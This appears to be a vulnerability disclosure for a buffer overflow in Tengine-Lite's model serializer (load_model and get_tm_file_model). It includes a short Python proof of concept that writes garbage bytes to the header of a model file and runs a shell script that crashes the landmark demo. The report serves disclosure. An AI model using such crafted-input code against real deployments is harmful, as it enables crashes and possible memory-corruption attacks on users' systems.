Description
Vulnerability analysis
We found that in the seriliazer module, there is a buffer overflow problem
Link:https://github.com/OAID/Tengine/blob/tengine-lite/src/serializer/tm/tm2_serializer.c
The problem is in the load_model function starting at line 798, which calls the get_tm_file_model function at line 840
The first parameter mem_base of the get_tm_file_model function points to the address space where the model file is located, and the second parameter is controlled by mem_base. For this project, the model is an input controlled by the user, so the parameters of get_tm_file_model can be controlled.
Poc
Download the official example model, and select the landmark model to demonstrate here.
According to the official use case, the landmark model is run normally, and the program executes normally.
Write 9 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. Program routine error.
Write 10 bytes of garbage data to the header of the landmark.tmfile file, and then run the landmark model. program crash.
EXP:
import os
os.system('cp landmark.tmfile test.tmfile')
with open("./test.tmfile","rb+") as f:
old=f.read()
len=0xA
print('Writes %d bytes of data to the file header'%(len))
text=b'A'*len
f.seek(0)
f.write(text)
f.write(old)
os.system('./attack.sh')
'''
attack.sh
dir='/mnt/hgfs/starcross/CVE/Tengine-Lite'
export LD_LIBRARY_PATH=$dir/build/install/lib
$dir/build/install/bin/tm_landmark -m $dir/model/landmark/test.tmfile -i $dir/model/landmark/photo.jpg -r 1 -t 1
'''